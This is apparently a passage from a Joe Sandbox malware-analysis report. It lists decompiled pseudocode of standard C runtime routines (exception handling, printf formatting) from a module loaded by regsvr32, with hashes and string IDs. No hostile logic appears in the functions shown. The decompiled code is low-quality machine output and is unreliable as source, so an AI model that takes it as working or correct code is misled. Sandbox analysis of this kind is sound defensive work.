                                                                                			E00007FFA7FFA52474960(void* __ecx, long long __rcx, long long __rdx, long long __r8, long long __r9, void* _a8, long long _a16, long long _a24, long long _a32, signed int _a40, intOrPtr _a48, long long _a56, long long _a64) {
                                                                                				long long _v24;
                                                                                				long long _v32;
                                                                                				long long _v40;
                                                                                				long long _v48;
                                                                                				long long _v56;
                                                                                				char _v60;
                                                                                				char _v64;
                                                                                				signed int _v72;
                                                                                				char _v80;
                                                                                				char _v88;
                                                                                				long long _v96;
                                                                                				intOrPtr _v104;
                                                                                				long long _v112;
                                                                                				long long _v120;
                                                                                				long long _v128;
                                                                                				signed int _v136;
                                                                                				void* _t106;
                                                                                				void* _t117;
                                                                                				void* _t118;
                                                                                				void* _t119;
                                                                                				void* _t120;
                                                                                				void* _t121;
                                                                                				long long _t153;
                                                                                				signed int _t161;
                                                                                				signed int _t165;
                                                                                				long long _t166;
                                                                                				long long _t169;
                                                                                				long long _t170;
                                                                                				intOrPtr _t174;
                                                                                
                                                                                				_a32 = __r9;
                                                                                				_a24 = __r8;
                                                                                				_a16 = __rdx;
                                                                                				_a8 = __rcx;
                                                                                				_t153 = _a8;
                                                                                				if ( *_t153 != 0x80000003) goto 0x52474990;
                                                                                				goto 0x52474cc6;
                                                                                				0x52464000();
                                                                                				if ( *((long long*)(_t153 + 0xe0)) == 0) goto 0x52474a33;
                                                                                				0x52464000();
                                                                                				_v56 = _t153;
                                                                                				E00007FFA7FFA52463D00(_t106);
                                                                                				if ( *((intOrPtr*)(_v56 + 0xe0)) == _t153) goto 0x52474a33;
                                                                                				if ( *_a8 == 0xe0434f4d) goto 0x52474a33;
                                                                                				if ( *_a8 == 0xe0434352) goto 0x52474a33;
                                                                                				_v120 = _a64;
                                                                                				_v128 = _a56;
                                                                                				_v136 = _a40;
                                                                                				if (E00007FFA7FFA5246E9B0(_a8, _a16, _a24, _a32) == 0) goto 0x52474a33;
                                                                                				goto 0x52474cc6;
                                                                                				if ( *((intOrPtr*)(_a40 + 0xc)) == 0) goto 0x52474a43;
                                                                                				goto 0x52474a48;
                                                                                				E00007FFA7FFA5246CF80(_a40);
                                                                                				_v120 = _a32;
                                                                                				_v128 =  &_v60;
                                                                                				_t161 =  &_v64;
                                                                                				_v136 = _t161;
                                                                                				r9d = _a48;
                                                                                				r8d = _a56;
                                                                                				E00007FFA7FFA5246EA30(_a16, _a40);
                                                                                				_v72 = _t161;
                                                                                				_v64 = _v64 + 1;
                                                                                				_v72 = _v72 + 0x14;
                                                                                				if (_v64 - _v60 >= 0) goto 0x52474cc6;
                                                                                				if (_a48 -  *_v72 < 0) goto 0x52474c2b;
                                                                                				_t165 = _v72;
                                                                                				if (_a48 -  *((intOrPtr*)(_t165 + 4)) > 0) goto 0x52474c2b;
                                                                                				_t117 = E00007FFA7FFA5246E680( *((intOrPtr*)(_t165 + 4)), _t165);
                                                                                				_t166 = _t165 +  *((intOrPtr*)(_v72 + 0x10));
                                                                                				if ( *((intOrPtr*)(_t166 + 4 + ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14)) == 0) goto 0x52474b53;
                                                                                				_t118 = E00007FFA7FFA5246E680(_t117, _t166);
                                                                                				_v48 = _t166;
                                                                                				_t119 = E00007FFA7FFA5246E680(_t118, _t166);
                                                                                				_t169 = _v48 +  *((intOrPtr*)(_t166 +  *((intOrPtr*)(_v72 + 0x10)) + 4 + ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14));
                                                                                				_v40 = _t169;
                                                                                				goto 0x52474b5f;
                                                                                				_v40 = 0;
                                                                                				if (_v40 == 0) goto 0x52474bff;
                                                                                				_t120 = E00007FFA7FFA5246E680(_t119, _t169);
                                                                                				_t170 = _t169 +  *((intOrPtr*)(_v72 + 0x10));
                                                                                				if ( *((intOrPtr*)(_t170 + 4 + ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14)) == 0) goto 0x52474be3;
                                                                                				_t121 = E00007FFA7FFA5246E680(_t120, _t170);
                                                                                				_v32 = _t170;
                                                                                				E00007FFA7FFA5246E680(_t121, _t170);
                                                                                				_v24 = _v32 +  *((intOrPtr*)(_t170 +  *((intOrPtr*)(_v72 + 0x10)) + 4 + ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14));
                                                                                				goto 0x52474bef;
                                                                                				_v24 = 0;
                                                                                				_t174 = _v24;
                                                                                				if ( *((char*)(_t174 + 0x10)) != 0) goto 0x52474c2b;
                                                                                				E00007FFA7FFA5246E680( *((char*)(_t174 + 0x10)), _t174);
                                                                                				if (( *(_t174 +  *((intOrPtr*)(_v72 + 0x10)) + ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14) & 0x00000040) == 0) goto 0x52474c30;
                                                                                				goto L1;
                                                                                				__eax = E00007FFA7FFA5246E680(__eax, __rax);
                                                                                				_v72 =  *((intOrPtr*)(_v72 + 0x10));
                                                                                				__rax = __rax +  *((intOrPtr*)(_v72 + 0x10));
                                                                                				_v72 =  *((intOrPtr*)(_v72 + 0xc)) - 1;
                                                                                				__rcx = ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14;
                                                                                				__rax = __rax + ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14;
                                                                                				__eflags = __rax;
                                                                                				_v80 = 0;
                                                                                				_v88 = 1;
                                                                                				__rcx = _a64;
                                                                                				_v96 = _a64;
                                                                                				_v104 = _a56;
                                                                                				__rcx = _v72;
                                                                                				_v112 = _v72;
                                                                                				_v120 = 0;
                                                                                				_v128 = __rax;
                                                                                				__rax = _a40;
                                                                                				_v136 = _a40;
                                                                                				__r9 = _a32;
                                                                                				__r8 = _a24;
                                                                                				__rdx = _a16;
                                                                                				__rcx = _a8;
                                                                                				__eax = E00007FFA7FFA52475180(__edi, __esi, __esp, __eflags, _a8, _a16, _a24, _a32);
                                                                                				goto L1;
                                                                                				return __eax;
                                                                                			}

































                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: MOC$RCC
                                                                                • API String ID: 0-2084237596
                                                                                • Opcode ID: ff3899ab70367f580fbe79aa5854b52896b6d0a2cba9891fdbb3d09f9aae126f
                                                                                • Instruction ID: d1bc665d07e24bb357223e1130724a6ec17e266754547efdccbead5881b3be35
                                                                                • Opcode Fuzzy Hash: ff3899ab70367f580fbe79aa5854b52896b6d0a2cba9891fdbb3d09f9aae126f
                                                                                • Instruction Fuzzy Hash: 1791FB3260DB8186DA64DB45E49037AB3B0FBC5B44F198436EA9E43B99DF7CE442CB50
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 19%
                                                                                			E00007FFA7FFA5247C6F8(signed int __rax, void* __rdx, long long _a32, void* _a64, void* _a72, intOrPtr _a76, signed int _a80, char _a84, char _a85, intOrPtr _a88, long long _a92, long long _a96, signed char _a104, intOrPtr _a108, signed int _a116, char _a120, char _a687, char _a688, intOrPtr _a704, intOrPtr _a708, signed char _a816, signed int _a824, signed int _a832, intOrPtr _a840, signed short* _a848, signed char _a856, char _a860, char _a864, long long _a872, intOrPtr _a876, intOrPtr _a912, intOrPtr _a916, signed int _a1040, long long _a1048, signed short _a1056, long long _a1060, signed int _a1064, intOrPtr _a1088, char _a1112) {
                                                                                				signed int _t217;
                                                                                				signed char _t222;
                                                                                				intOrPtr _t257;
                                                                                				signed int _t332;
                                                                                				signed int _t333;
                                                                                				signed long long _t336;
                                                                                				intOrPtr* _t359;
                                                                                				signed long long _t384;
                                                                                
                                                                                				_t332 = __rax;
                                                                                				_a116 = 0x10;
                                                                                				asm("bts eax, 0xf");
                                                                                				_a708 = 7;
                                                                                				_a708 = 0x27;
                                                                                				_a72 = 0x10;
                                                                                				if ((_a80 & 0x00000080) == 0) goto 0x5247c754;
                                                                                				_a84 = 0x30;
                                                                                				_a85 = _a708 + 0x51;
                                                                                				_a92 = 2;
                                                                                				_a72 = 8;
                                                                                				if ((_a80 & 0x00000080) == 0) goto 0x5247c777;
                                                                                				asm("bts eax, 0x9");
                                                                                				if ((_a80 & 0x00008000) == 0) goto 0x5247c79e;
                                                                                				E00007FFA7FFA52471EA0( &_a1112);
                                                                                				_a824 = _t332;
                                                                                				goto 0x5247c84b;
                                                                                				if ((_a80 & 0x00001000) == 0) goto 0x5247c7c5;
                                                                                				E00007FFA7FFA52471EA0( &_a1112);
                                                                                				_a824 = _t332;
                                                                                				goto 0x5247c84b;
                                                                                				if ((_a80 & 0x00000020) == 0) goto 0x5247c810;
                                                                                				if ((_a80 & 0x00000040) == 0) goto 0x5247c7f6;
                                                                                				_t333 = E00007FFA7FFA52471E40( &_a1112);
                                                                                				_a824 = _t333;
                                                                                				goto 0x5247c80e;
                                                                                				E00007FFA7FFA52471E40( &_a1112);
                                                                                				_a824 = _t333;
                                                                                				goto 0x5247c84b;
                                                                                				if ((_a80 & 0x00000040) == 0) goto 0x5247c834;
                                                                                				E00007FFA7FFA52471E40( &_a1112);
                                                                                				_a824 = _t333;
                                                                                				goto 0x5247c84b;
                                                                                				E00007FFA7FFA52471E40( &_a1112);
                                                                                				_a824 = _t333;
                                                                                				if ((_a80 & 0x00000040) == 0) goto 0x5247c882;
                                                                                				if (_a824 >= 0) goto 0x5247c882;
                                                                                				_a832 =  ~_a824;
                                                                                				asm("bts eax, 0x8");
                                                                                				goto 0x5247c892;
                                                                                				_t336 = _a824;
                                                                                				_a832 = _t336;
                                                                                				if ((_a80 & 0x00008000) != 0) goto 0x5247c8c7;
                                                                                				if ((_a80 & 0x00001000) != 0) goto 0x5247c8c7;
                                                                                				_a832 = _a832 & _t336;
                                                                                				if (_a116 >= 0) goto 0x5247c8d8;
                                                                                				_a116 = 1;
                                                                                				goto 0x5247c8f5;
                                                                                				_a80 = _a80 & 0xfffffff7;
                                                                                				if (_a116 - 0x200 <= 0) goto 0x5247c8f5;
                                                                                				_a116 = 0x200;
                                                                                				if (_a832 != 0) goto 0x5247c908;
                                                                                				_a92 = 0;
                                                                                				_a64 =  &_a687;
                                                                                				_t217 = _a116;
                                                                                				_a116 = _a116 - 1;
                                                                                				if (_t217 > 0) goto 0x5247c936;
                                                                                				if (_a832 == 0) goto 0x5247c9d3;
                                                                                				_a1040 = _a72;
                                                                                				_a816 = _t217 / _a1040 + 0x30;
                                                                                				_a1048 = _a72;
                                                                                				if (_a816 - 0x39 <= 0) goto 0x5247c9b2;
                                                                                				_t222 = _a816 + _a708;
                                                                                				_a816 = _t222;
                                                                                				 *_a64 = _a816 & 0x000000ff;
                                                                                				_a64 = _a64 - 1;
                                                                                				goto 0x5247c915;
                                                                                				_a104 = _t222;
                                                                                				_a64 = _a64 + 1;
                                                                                				if ((_a80 & 0x00000200) == 0) goto 0x5247ca31;
                                                                                				if (_a104 == 0) goto 0x5247ca12;
                                                                                				if ( *_a64 == 0x30) goto 0x5247ca31;
                                                                                				_a64 = _a64 - 1;
                                                                                				 *_a64 = 0x30;
                                                                                				_a104 = _a104 + 1;
                                                                                				if (_a108 != 0) goto 0x5247cc6e;
                                                                                				if ((_a80 & 0x00000040) == 0) goto 0x5247ca95;
                                                                                				if ((_a80 & 0x00000100) == 0) goto 0x5247ca63;
                                                                                				_a84 = 0x2d;
                                                                                				_a92 = 1;
                                                                                				goto 0x5247ca95;
                                                                                				if ((_a80 & 0x00000001) == 0) goto 0x5247ca7d;
                                                                                				_a84 = 0x2b;
                                                                                				_a92 = 1;
                                                                                				goto 0x5247ca95;
                                                                                				if ((_a80 & 0x00000002) == 0) goto 0x5247ca95;
                                                                                				_a84 = 0x20;
                                                                                				_a92 = 1;
                                                                                				_a840 = _a88 - _a104 - _a92;
                                                                                				if ((_a80 & 0x0000000c) != 0) goto 0x5247cad5;
                                                                                				E00007FFA7FFA5247CF10(0x20, _a840, _a1088,  &_a688);
                                                                                				E00007FFA7FFA5247CF60(_a92, _a64,  &_a84, _a1088,  &_a688);
                                                                                				if ((_a80 & 0x00000008) == 0) goto 0x5247cb27;
                                                                                				if ((_a80 & 0x00000004) != 0) goto 0x5247cb27;
                                                                                				E00007FFA7FFA5247CF10(0x30, _a840, _a1088,  &_a688);
                                                                                				if (_a76 == 0) goto 0x5247cc1d;
                                                                                				if (_a104 <= 0) goto 0x5247cc1d;
                                                                                				_a872 = 0;
                                                                                				_a848 = _a64;
                                                                                				_a856 = _a104;
                                                                                				_a856 = _a856 - 1;
                                                                                				if (_a856 == 0) goto 0x5247cc1b;
                                                                                				_a1056 =  *_a848 & 0x0000ffff;
                                                                                				r9d = _a1056 & 0x0000ffff;
                                                                                				r8d = 6;
                                                                                				_a872 = E00007FFA7FFA5247B530( &_a860,  &_a864, _a1088);
                                                                                				_a848 =  &(_a848[1]);
                                                                                				if (_a872 != 0) goto 0x5247cbe5;
                                                                                				if (_a860 != 0) goto 0x5247cbf2;
                                                                                				_a688 = 0xffffffff;
                                                                                				goto 0x5247cc1b;
                                                                                				E00007FFA7FFA5247CF60(_a860,  &(_a848[1]),  &_a864, _a1088,  &_a688);
                                                                                				goto 0x5247cb60;
                                                                                				goto 0x5247cc3b;
                                                                                				E00007FFA7FFA5247CF60(_a104,  &(_a848[1]), _a64, _a1088,  &_a688);
                                                                                				if (_a688 < 0) goto 0x5247cc6e;
                                                                                				if ((_a80 & 0x00000004) == 0) goto 0x5247cc6e;
                                                                                				E00007FFA7FFA5247CF10(0x20, _a840, _a1088,  &_a688);
                                                                                				if (_a96 == 0) goto 0x5247cc8e;
                                                                                				0x52465330();
                                                                                				_a96 = 0;
                                                                                				goto 0x5247b99c;
                                                                                				if (_a704 == 0) goto 0x5247ccb4;
                                                                                				if (_a704 == 7) goto 0x5247ccb4;
                                                                                				_a1060 = 0;
                                                                                				goto 0x5247ccbf;
                                                                                				_a1060 = 1;
                                                                                				_t257 = _a1060;
                                                                                				_a876 = _t257;
                                                                                				if (_a876 != 0) goto 0x5247cd05;
                                                                                				_t359 = L"((state == ST_NORMAL) || (state == ST_TYPE))";
                                                                                				_a32 = _t359;
                                                                                				r9d = 0;
                                                                                				r8d = 0x8f5;
                                                                                				0x5246b3b0();
                                                                                				if (_t257 != 1) goto 0x5247cd05;
                                                                                				asm("int3");
                                                                                				if (_a876 != 0) goto 0x5247cd61;
                                                                                				0x5246ab30();
                                                                                				 *_t359 = 0x16;
                                                                                				_a32 = 0;
                                                                                				r9d = 0x8f5;
                                                                                				E00007FFA7FFA5246BD70(L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                                                                				_a912 = 0xffffffff;
                                                                                				E00007FFA7FFA52466800( &_a120);
                                                                                				goto 0x5247cd80;
                                                                                				_a916 = _a688;
                                                                                				E00007FFA7FFA52466800( &_a120);
                                                                                				return E00007FFA7FFA52463280(_a916, 2, 2, _a1064 ^ _t384, L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                                                                			}












                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: get_int64_arg
                                                                                • String ID: 0$9
                                                                                • API String ID: 1967237116-1975997740
                                                                                • Opcode ID: aed7fbe3ab945623e5c36a128674cf35c8ffbba07ad38133e4628ccf625e54aa
                                                                                • Instruction ID: 57e204704506def0d18eac6b412e6b962d8982ad7a5a7fda6440501a19c43717
                                                                                • Opcode Fuzzy Hash: aed7fbe3ab945623e5c36a128674cf35c8ffbba07ad38133e4628ccf625e54aa
                                                                                • Instruction Fuzzy Hash: 0441D27360DAC18BE7758B19E8813AAB7F4F785750F184125E79C8AA88DBBCD545CF00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 23%
                                                                                			E00007FFA7FFA5247E70C(signed int __rax, void* __rdx, long long _a32, void* _a64, void* _a72, intOrPtr _a76, signed int _a80, char _a84, short _a86, intOrPtr _a88, long long _a92, long long _a96, signed char _a104, intOrPtr _a108, signed int _a116, char _a120, char _a687, char _a1200, signed short _a1212, intOrPtr _a1216, intOrPtr _a1220, signed char _a1296, signed int _a1304, signed int _a1312, intOrPtr _a1320, long long _a1328, signed char _a1336, intOrPtr _a1340, intOrPtr _a1344, intOrPtr _a1376, intOrPtr _a1380, signed int _a1480, long long _a1488, long long _a1496, long long _a1504, signed int _a1512, intOrPtr _a1536, char _a1560) {
                                                                                				signed int _t213;
                                                                                				signed char _t218;
                                                                                				void* _t249;
                                                                                				intOrPtr _t257;
                                                                                				signed int _t331;
                                                                                				signed int _t332;
                                                                                				signed long long _t335;
                                                                                				intOrPtr* _t354;
                                                                                				intOrPtr* _t359;
                                                                                				signed long long _t389;
                                                                                
                                                                                				_t331 = __rax;
                                                                                				_a1220 = 0x27;
                                                                                				_a72 = 0x10;
                                                                                				if ((_a80 & 0x00000080) == 0) goto 0x5247e74d;
                                                                                				_a84 = 0x30;
                                                                                				_a86 = _a1220 + 0x51;
                                                                                				_a92 = 2;
                                                                                				_a72 = 8;
                                                                                				if ((_a80 & 0x00000080) == 0) goto 0x5247e770;
                                                                                				asm("bts eax, 0x9");
                                                                                				if ((_a80 & 0x00008000) == 0) goto 0x5247e797;
                                                                                				E00007FFA7FFA52471EA0( &_a1560);
                                                                                				_a1304 = _t331;
                                                                                				goto 0x5247e844;
                                                                                				if ((_a80 & 0x00001000) == 0) goto 0x5247e7be;
                                                                                				E00007FFA7FFA52471EA0( &_a1560);
                                                                                				_a1304 = _t331;
                                                                                				goto 0x5247e844;
                                                                                				if ((_a80 & 0x00000020) == 0) goto 0x5247e809;
                                                                                				if ((_a80 & 0x00000040) == 0) goto 0x5247e7ef;
                                                                                				_t332 = E00007FFA7FFA52471E40( &_a1560);
                                                                                				_a1304 = _t332;
                                                                                				goto 0x5247e807;
                                                                                				E00007FFA7FFA52471E40( &_a1560);
                                                                                				_a1304 = _t332;
                                                                                				goto 0x5247e844;
                                                                                				if ((_a80 & 0x00000040) == 0) goto 0x5247e82d;
                                                                                				E00007FFA7FFA52471E40( &_a1560);
                                                                                				_a1304 = _t332;
                                                                                				goto 0x5247e844;
                                                                                				E00007FFA7FFA52471E40( &_a1560);
                                                                                				_a1304 = _t332;
                                                                                				if ((_a80 & 0x00000040) == 0) goto 0x5247e87b;
                                                                                				if (_a1304 >= 0) goto 0x5247e87b;
                                                                                				_a1312 =  ~_a1304;
                                                                                				asm("bts eax, 0x8");
                                                                                				goto 0x5247e88b;
                                                                                				_t335 = _a1304;
                                                                                				_a1312 = _t335;
                                                                                				if ((_a80 & 0x00008000) != 0) goto 0x5247e8c0;
                                                                                				if ((_a80 & 0x00001000) != 0) goto 0x5247e8c0;
                                                                                				_a1312 = _a1312 & _t335;
                                                                                				if (_a116 >= 0) goto 0x5247e8d1;
                                                                                				_a116 = 1;
                                                                                				goto 0x5247e8ee;
                                                                                				_a80 = _a80 & 0xfffffff7;
                                                                                				if (_a116 - 0x200 <= 0) goto 0x5247e8ee;
                                                                                				_a116 = 0x200;
                                                                                				if (_a1312 != 0) goto 0x5247e901;
                                                                                				_a92 = 0;
                                                                                				_a64 =  &_a687;
                                                                                				_t213 = _a116;
                                                                                				_a116 = _a116 - 1;
                                                                                				if (_t213 > 0) goto 0x5247e92f;
                                                                                				if (_a1312 == 0) goto 0x5247e9cc;
                                                                                				_a1480 = _a72;
                                                                                				_a1296 = _t213 / _a1480 + 0x30;
                                                                                				_a1488 = _a72;
                                                                                				if (_a1296 - 0x39 <= 0) goto 0x5247e9ab;
                                                                                				_t218 = _a1296 + _a1220;
                                                                                				_a1296 = _t218;
                                                                                				 *_a64 = _a1296 & 0x000000ff;
                                                                                				_a64 = _a64 - 1;
                                                                                				goto 0x5247e90e;
                                                                                				_a104 = _t218;
                                                                                				_a64 = _a64 + 1;
                                                                                				if ((_a80 & 0x00000200) == 0) goto 0x5247ea2a;
                                                                                				if (_a104 == 0) goto 0x5247ea0b;
                                                                                				if ( *_a64 == 0x30) goto 0x5247ea2a;
                                                                                				_a64 = _a64 - 1;
                                                                                				 *_a64 = 0x30;
                                                                                				_a104 = _a104 + 1;
                                                                                				if (_a108 != 0) goto 0x5247ec7c;
                                                                                				if ((_a80 & 0x00000040) == 0) goto 0x5247ea9d;
                                                                                				if ((_a80 & 0x00000100) == 0) goto 0x5247ea61;
                                                                                				_a84 = 0x2d;
                                                                                				_a92 = 1;
                                                                                				goto 0x5247ea9d;
                                                                                				if ((_a80 & 0x00000001) == 0) goto 0x5247ea80;
                                                                                				_a84 = 0x2b;
                                                                                				_a92 = 1;
                                                                                				goto 0x5247ea9d;
                                                                                				if ((_a80 & 0x00000002) == 0) goto 0x5247ea9d;
                                                                                				_a84 = 0x20;
                                                                                				_a92 = 1;
                                                                                				_a1320 = _a88 - _a104 - _a92;
                                                                                				if ((_a80 & 0x0000000c) != 0) goto 0x5247eadf;
                                                                                				E00007FFA7FFA5247EEC0(0x20, _a1320, _a1536,  &_a1200);
                                                                                				E00007FFA7FFA5247EF10(_a92, _a64,  &_a84, _a1536,  &_a1200);
                                                                                				if ((_a80 & 0x00000008) == 0) goto 0x5247eb33;
                                                                                				if ((_a80 & 0x00000004) != 0) goto 0x5247eb33;
                                                                                				E00007FFA7FFA5247EEC0(0x30, _a1320, _a1536,  &_a1200);
                                                                                				if (_a76 != 0) goto 0x5247ec29;
                                                                                				if (_a104 <= 0) goto 0x5247ec29;
                                                                                				_t354 = _a64;
                                                                                				_a1328 = _t354;
                                                                                				_a1336 = _a104;
                                                                                				_a1336 = _a1336 - 1;
                                                                                				if (_a1336 <= 0) goto 0x5247ec27;
                                                                                				_t249 = E00007FFA7FFA52466840(_a1336,  &_a120);
                                                                                				_a1496 = _t354;
                                                                                				E00007FFA7FFA52466840(_t249,  &_a120);
                                                                                				_a1340 = E00007FFA7FFA5247F000( &_a1212, _a1328,  *((intOrPtr*)( *_t354 + 0x10c)), _a1496);
                                                                                				if (_a1340 > 0) goto 0x5247ebe7;
                                                                                				_a1200 = 0xffffffff;
                                                                                				goto 0x5247ec27;
                                                                                				E00007FFA7FFA5247EE40(_a1212 & 0x0000ffff, _a1536,  &_a1200);
                                                                                				_a1328 = _a1328 + _a1340;
                                                                                				goto 0x5247eb61;
                                                                                				goto 0x5247ec47;
                                                                                				E00007FFA7FFA5247EF10(_a104, _a1328 + _a1340, _a64, _a1536,  &_a1200);
                                                                                				if (_a1200 < 0) goto 0x5247ec7c;
                                                                                				if ((_a80 & 0x00000004) == 0) goto 0x5247ec7c;
                                                                                				E00007FFA7FFA5247EEC0(0x20, _a1320, _a1536,  &_a1200);
                                                                                				if (_a96 == 0) goto 0x5247ec9c;
                                                                                				0x52465330();
                                                                                				_a96 = 0;
                                                                                				goto 0x5247da75;
                                                                                				if (_a1216 == 0) goto 0x5247ecc2;
                                                                                				if (_a1216 == 7) goto 0x5247ecc2;
                                                                                				_a1504 = 0;
                                                                                				goto 0x5247eccd;
                                                                                				_a1504 = 1;
                                                                                				_t257 = _a1504;
                                                                                				_a1344 = _t257;
                                                                                				if (_a1344 != 0) goto 0x5247ed13;
                                                                                				_t359 = L"((state == ST_NORMAL) || (state == ST_TYPE))";
                                                                                				_a32 = _t359;
                                                                                				r9d = 0;
                                                                                				r8d = 0x8f5;
                                                                                				0x5246b3b0();
                                                                                				if (_t257 != 1) goto 0x5247ed13;
                                                                                				asm("int3");
                                                                                				if (_a1344 != 0) goto 0x5247ed6f;
                                                                                				0x5246ab30();
                                                                                				 *_t359 = 0x16;
                                                                                				_a32 = 0;
                                                                                				r9d = 0x8f5;
                                                                                				E00007FFA7FFA5246BD70(L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                                                                				_a1376 = 0xffffffff;
                                                                                				E00007FFA7FFA52466800( &_a120);
                                                                                				goto 0x5247ed8e;
                                                                                				_a1380 = _a1200;
                                                                                				E00007FFA7FFA52466800( &_a120);
                                                                                				return E00007FFA7FFA52463280(_a1380, 2, 2, _a1512 ^ _t389, L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                                                                			}














                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: get_int64_arg
                                                                                • String ID: '$9
                                                                                • API String ID: 1967237116-1823400153
                                                                                • Opcode ID: 96444a5ecc25f07181ec4491dd73a0df774b8fd8e649fad80ce219d3ce06daa6
                                                                                • Instruction ID: 8a667b30d747ca4a9982cd1de88f5bca883b3039c16f9becd1da5126e3d560cd
                                                                                • Opcode Fuzzy Hash: 96444a5ecc25f07181ec4491dd73a0df774b8fd8e649fad80ce219d3ce06daa6
                                                                                • Instruction Fuzzy Hash: 5041FA3260DAC586E7748B19E8403ABB3F4FB86341F088525E69CC7B98EBBCD4418F04
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _unlock
                                                                                • String ID: _BLOCK_TYPE_IS_VALID(pHead->nBlockUse)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgdel.cpp
                                                                                • API String ID: 2480363372-1749241151
                                                                                • Opcode ID: 2b49e58eed8e6e59642ee45ba138bd684622393025d622caadb7daf1159c6293
                                                                                • Instruction ID: 3cf63ea4251f4fcb46b05a9f75b2e9a005ce6a1309fe0346c569ec2d1b29c386
                                                                                • Opcode Fuzzy Hash: 2b49e58eed8e6e59642ee45ba138bd684622393025d622caadb7daf1159c6293
                                                                                • Instruction Fuzzy Hash: 06113036A38A86C6EB649B18D84162963F1FBC6750F089035E65D47B98CFBCE445CB00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: DestroyedExceptionFindFrameObjectUnlink
                                                                                • String ID: csm
                                                                                • API String ID: 1826589669-1018135373
                                                                                • Opcode ID: 34ffa76e03f6f125ffde0022bc26c820041218dfec633c9b0636301340e9056d
                                                                                • Instruction ID: dc5cabcb24ff0b13e4513880aa9c24e26a8bb81d7c148fab24ac8e9ba852b650
